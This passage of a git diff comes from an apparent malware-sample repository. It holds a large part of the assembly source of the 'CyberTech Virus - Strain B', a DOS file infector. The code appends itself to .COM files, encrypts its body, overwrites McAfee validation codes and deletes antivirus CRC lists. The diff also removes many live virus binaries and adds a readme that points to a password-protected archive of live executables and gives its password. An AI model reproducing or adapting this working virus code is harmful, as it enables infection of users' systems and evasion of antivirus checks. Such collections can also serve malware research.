Pop Es ; - Mov Di,0fd80h ; - Mov Cx,80h ; -Trans: Lodsb ; - Cmp Al,0 ; - Je Verder ; - Stosb ; - Loop Trans ; - -Verder: Stosb - Sub Di,12 - Push Cs - Pop Ds - Mov Ax,[Di][0] ; - Cmp Ax,'OC' - Jne Normal - Mov Ax,[Di][2] - Cmp Ax,'MM' - Jne Normal - Mov Ax,[Di][4] - Cmp Ax,'NA' - Jne Normal - Jmp Ready - -Normal: Push Cs ; Read file attributes and - Pop Ds ; check if an error has - Mov Ax,4300h ; occured - Mov Dx,0fd80h ; - Int 21h ; - Jnc DeInfect ; - No error, DeInfect - Jmp Ready ; - Error, Ready - -DeInfect: Push Cx ; Store old file attributes - - Mov Ax,4301h ; Clear file attributes - Xor Cx,Cx ; (for read only etc.) - Int 21h ; - - Mov Ax,3d02h ; Open the file - Int 21h ; - - Mov Bx,Ax ; Read file date/time stamp - Mov Ax,5700h ; and store it on the stack - Int 21h ; for later use - Push Cx ; - Push Dx ; - - Mov Ah,3eh ; Close file - Int 21h ; - - Mov Dx,0fd80h ; Create a new file with the - Xor Cx,Cx ; same name - Mov Ah,3ch ; - Int 21h ; - - Mov Bx,Ax ; store file handle in BX - - Mov Dx,100h ; program to file (the original - Mov Cx,Bp ; file is now back again) - Sub Cx,0fch ; - - Mov Ah,40h ; write memory image of host - Int 21h ; - - Pop Dx ; restore file date/time - Pop Cx ; stamp - Mov Ax,5701h ; - Int 21h ; - - Mov Ah,3eh ; close file - Int 21h ; - - Pop Cx ; restore file attributes - Mov Ax,4301h ; - Mov Dx,0fd80h ; - Int 21h ; - - Push Cs ; Show message that the - Pop Ds ; system has been infected - Mov Ah,9 ; and shutdown virus - Lea Dx,Removed[Bp] ; - Int 21h ; - Jmp Ready ; - -; -; Main viral part -; - -NoClean: Mov Ah,1ah ; Store DTA at safe place - Mov Dx,0fd00h ; - Int 21h ; - - Mov Ah,4eh ; FindFirsFile Function - -Search: Lea Dx,FileSpec[BP] ; Search for filespec given - Xor Cx,Cx ; in FileSpec adress - Int 21h ; - Jnc Found ; Found - Found - Jmp Ready ; Not Found - Ready - -Found: Mov Ax,4300h ; Get file attributes and - Mov Dx,0fd1eh ; store them on the stack - Int 21h ; - Push Cx ; - - Mov Ax,4301h ; clear file attributes - Xor Cx,Cx ; - Int 21h ; - - Mov Ax,3d02h ; open file with read/write - Int 21h ; access - - Mov Bx,5700h ; save file date/time stamp - Xchg Ax,Bx ; on the stack - Int 21h ; - Push Cx ; - Push Dx ; - - Mov Ah,3fh ; read the first 4 bytes of - Lea Dx,OrgPrg[BP] ; the program onto OrgPrg - Mov Cx,4 ; - Int 21h ; - - Mov Ax,Cs:[OrgPrg][BP] ; Check if renamed exe-file - Cmp Ax,'ZM' ; - Je ExeFile ; - - Cmp Ax,'MZ' ; Check if renamed weird exe- - Je ExeFile ; file - - Mov Ah,Cs:[OrgPrg+3][BP] ; Check if already infected - Cmp Ah,'*' ; - Jne Infect ; - -ExeFile: Call Close ; If one of the checks is yes, - Mov Ah,4fh ; close file and search next - Jmp Search ; file - -FSeek: Xor Cx,Cx ; subroutine to jump to end - Xor Dx,Dx ; or begin of file - Int 21h ; - Ret ; - -Infect: Mov Ax,0fd1e[0] ; check if the file is - Cmp Ax,'OC' ; COMMAN?.COM (usually result - Jne NoCommand ; if COMMAND.COM) - Mov Ax,0fd1e[2] ; - Cmp Ax,'MM' ; - Jne NoCommand ; - Mov Ax,0fd1e[4] ; - Cmp Ax,'NA' ; - Jne NoCommand ; - - Mov Ax,4202h ; Jump to EOF - Call Fseek ; - - Cmp Ax,0f000h ; Check if file too large - Jae ExeFile - - Cmp Ax,VirS ; Check if file to short - jbe ExeFile - - Sub Ax,VirS - Xchg Cx,Dx - Mov Dx,4200h - Xchg Dx,Ax - Mov EOFminVir[BP],Dx - Int 21h - Mov Ah,3fh - Mov Dx,Offset Buffer - Mov Cx,VirS - Int 21h - Cld - Mov Si,Offset Buffer - Mov Cx,VirLen -On5: - Push Cx -On6: Lodsb - Cmp Al,0 - Jne On4 - Loop On6 -On4: Cmp Cx,0 - Je Found0 - - Pop Cx - Cmp Si,SeekLen - Jb On5 - Jmp NoCommand - -Found0: Pop Cx - Sub Si,Offset Buffer - Sub Si,Cx - Xor Cx,Cx - Mov Dx,EOFminVir[BP] - Add Dx,Si - - Mov Ax,4200h - Int 21h - Jmp CalcVirus - -EOFminVir Dw 0 - -NoCommand: Mov Ax,4202h ; jump to EOF - Call FSeek ; - - Cmp Ax,0f000h ; Check if file too large - Jb NoExe1 ; if yes, goto exefile - Jmp ExeFile ; - -NoExe1: Cmp Ax,10 ; Check if file too short - Ja NoExe2 ; if yes, goto exefile - Jmp ExeFile ; - - -NoExe2: Mov Cx,Dx ; calculate pointer to offset - Mov Dx,Ax ; EOF-52 (for McAfee validation - Sub Dx,52 ; codes) - - Mov Si,Cx ; move file pointer to the - Mov Di,Dx ; calculated address - Mov Ax,4200h ; - Int 21h ; - - Mov Ah,3fh ; read the last 52 bytes - Mov Dx,0fb00h ; of the file - Mov Cx,52 ; - Int 21h ; - - Cmp Ds:0Fb00h,0fdf0h ; check if protected with the - Jne Check2 ; AG option - Cmp Ds:0fb02h,0aac5h ; - Jne Check2 ; - - Mov Ax,4200h ; yes - let virus overwrite - Mov Cx,Si ; the code with itself, so - Mov Dx,Di ; the file has no validation - Int 21h ; code - Jmp CalcVirus ; - -Check2: Cmp Ds:0Fb00h+42,0fdf0h ; check if protected with the - Jne Eof ; AV option - Cmp Ds:0Fb02h+42,0aac5h ; - Jne Eof ; - - Mov Ax,4200h ; yes - let virus overwrite - Mov Cx,Si ; the code with itself, so - Mov Dx,Di ; the file has no validation - Add Dx,42 ; code - Int 21h ; - Jmp CalcVirus ; - -Eof: Mov Ax,4202h ; not AG or AV - jump to - Call Fseek ; EOF - -CalcVirus: Sub Ax,3 ; calculate the jump for the - Mov Cs:CallPtr[BP]+1,Ax ; virus start - -GetCrypt: Mov Ah,2ch ; get 100s seconds for the - Int 21h ; encryption value. - Cmp Dl,0 ; if not zero, goto NoZero - Jne NoZero ; - - Mov Ah,9 ; If zero, display copyright - Lea Dx,Msg[Bp] ; message and generate again - Int 21h ; a number - Jmp GetCrypt ; - -NoZero: Mov Cs:Decrypt+2[BP],Dl ; Store key into decryptor - - Lea Si,MainVir[BP] ; Move changed decryptor to - Mov Di,0fb00h ; a safe place in memory - Mov Cx,DecrLen ; - Rep Movsb ; - - Lea Si,Crypt[BP] ; Encrypt the virus and merge - Mov Cx,CryptLen ; it to the changed decryptor -Encrypt: Lodsb ; code - Xor Al,Dl ; - Stosb ; - Loop Encrypt ; - - Mov Ah,40h ; append virus at EOF or over - Lea Dx,0fb00h ; the validation code of - Mov Cx,VirLen ; McAfee - Int 21h ; - - Mov Ax,4200h ; Jump to BOF - Call FSeek ; - - Mov Ah,40h ; Write Jump at BOF - Lea Dx,CallPtr[BP] ; - Mov Cx,4 ; - Int 21h ; - - Call Close ; Jump to Close routine - -Ready: Mov Ah,1ah ; Restore DTA to normal - Mov Dx,80h ; offset - Int 21h ; - - Mov Ax,Cs:OldInt24[Bp] ; remove critical error - Mov Dx,Cs:OldInt24+2[Bp] ; handler and store the - Xor Bx,Bx ; original handler at the - Push Bx ; interrupt table - Pop Ds ; - Mov Ds:[4*24h],Dx ; - Mov Ds:[4*24h]+2,Ax ; - Push Cs ; - Pop Ds ; - - Pop Ax ; restore possible error code - - Mov Bx,100h ; nice way to jump to the - Push Cs ; begin of the original host - Push Bx ; code - Retf ; - -Close: Pop Si ; why??? - - Pop Dx ; restore file date/time - Pop Cx ; stamp - Mov Ax,5701h ; - Int 21h ; - - Mov Ah,3eh ; close file - Int 21h ; - - Mov Ax,4301h ; restore file attributes - Pop Cx ; - Mov Dx,0fd1eh ; - Int 21h ; - - Mov Ah,41h ; delete CHKLIST.CPS (the - Lea Dx,CpsName[BP] ; Central Point CRC list) - Int 21h ; - - Push Si ; why??? - Ret - -; -; Message when we are in 1994 -; - -;Removed Db 13,10,'Virus removed : ',13,10 - -Removed Db 13,10,'The previous year you have been infected by a virus' - Db 13,10,'without knowing or removing it. To be gentle to you' - Db 13,10,'I decided to remove myself from your system. I suggest' - Db 13,10,'you better buy ViruScan of McAfee to ensure yourself' - Db 13,10,'complete security of your precious data. Next time you' - Db 13,10,'could be infected with a malevolent virus.' - Db 13,10,10,'May I say goodbye to you for now....',13,10 - -; -; Message when encryption byte = 0 or when we are living in 1994 -; - -Msg Db 13,10,'CyberTech Virus - Strain B' - Db 13,10,'(C) 1992 John Tardy of Trident' - Db 13,10,'$' - -; -; New critical error handler -; - -NewInt24: Mov Al,3 ; supress any critical error - Iret ; messages - -CpsName Db 'chklist.cps',0 ; name for CP CRC-list - -OldInt24 Dd 0 ; storage place for old int 24 - -CallPtr Db 0e9h,0,0 ; jump to place at BOF - -FileSpec Db '*.COM',0 ; filespec and infection marker - -OrgPrg: Int 20h ; original program - Db 'JT' ; - -CryptLen Equ $-Crypt ; encrypted part length - -VirLen Equ $-MainVir ; total virus length - -Buffer Equ 0f040h ; buffer offset -VirS Equ VirLen*2 - -SeekLen Equ Buffer+Virs - -; -; > and Remember Don't Forget to Call < -; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < -; diff --git a/q/QBootDr6.com b/q/QBootDr6.com deleted file mode 100755 index 8698dbf..0000000 Binary files a/q/QBootDr6.com and /dev/null differ diff --git a/q/QBootDr6.exe b/q/QBootDr6.exe deleted file mode 100755 index 858b78e..0000000 Binary files a/q/QBootDr6.exe and /dev/null differ diff --git a/q/QMU.1513.com b/q/QMU.1513.com deleted file mode 100755 index c9fa7d1..0000000 Binary files a/q/QMU.1513.com and /dev/null differ diff --git a/q/QRes.149.com b/q/QRes.149.com deleted file mode 100755 index 1efef65..0000000 Binary files a/q/QRes.149.com and /dev/null differ diff --git a/q/QScare.cascade.com b/q/QScare.cascade.com deleted file mode 100755 index 8fa67ac..0000000 Binary files a/q/QScare.cascade.com and /dev/null differ diff --git a/q/Quadratic.1283.com b/q/Quadratic.1283.com deleted file mode 100755 index a758d2a..0000000 Binary files a/q/Quadratic.1283.com and /dev/null differ diff --git a/q/Quadratic.1285 (Gen1).com b/q/Quadratic.1285 (Gen1).com deleted file mode 100755 index 5a68072..0000000 Binary files a/q/Quadratic.1285 (Gen1).com and /dev/null differ diff --git a/q/Quadratic.981.com b/q/Quadratic.981.com deleted file mode 100755 index bbfa0cf..0000000 Binary files a/q/Quadratic.981.com and /dev/null differ diff --git a/q/Quadratic.986.com b/q/Quadratic.986.com deleted file mode 100755 index c2bd02f..0000000 Binary files a/q/Quadratic.986.com and /dev/null differ diff --git a/q/Quake.exe b/q/Quake.exe deleted file mode 100755 index f480c11..0000000 Binary files a/q/Quake.exe and /dev/null differ diff --git a/q/Quicky.exe b/q/Quicky.exe deleted file mode 100755 index bec6482..0000000 Binary files a/q/Quicky.exe and /dev/null differ diff --git a/q/Quiet.com b/q/Quiet.com deleted file mode 100755 index 7b744c3..0000000 Binary files a/q/Quiet.com and /dev/null differ diff --git a/q/Quinine.exe b/q/Quinine.exe deleted file mode 100755 index 845b2c3..0000000 Binary files a/q/Quinine.exe and /dev/null differ diff --git a/q/Quit.A.com b/q/Quit.A.com deleted file mode 100755 index 791bd1a..0000000 Binary files a/q/Quit.A.com and /dev/null differ diff --git a/q/Quit.A.exe b/q/Quit.A.exe deleted file mode 100755 index 791bd1a..0000000 Binary files a/q/Quit.A.exe and /dev/null differ diff --git a/q/Quit.B.com b/q/Quit.B.com deleted file mode 100755 index 0ed4482..0000000 Binary files a/q/Quit.B.com and /dev/null differ diff --git a/q/q.7z b/q/q.7z new file mode 100644 index 0000000..f73ba92 Binary files /dev/null and b/q/q.7z differ diff --git a/q/readme.txt b/q/readme.txt new file mode 100644 index 0000000..bdf5d2a --- /dev/null +++ b/q/readme.txt @@ -0,0 +1,10 @@ +The files contained in q.7z are all live virii contained in .com or .exe +files. + +These are not source code, they are executables which can result in an +infection on DOS or Windows based systems if they are run with the +proper system permissions. They are, however, properly detected by +Windows Defender and many other commercial firewall products. + +To unpack this archive, use the password "virus". +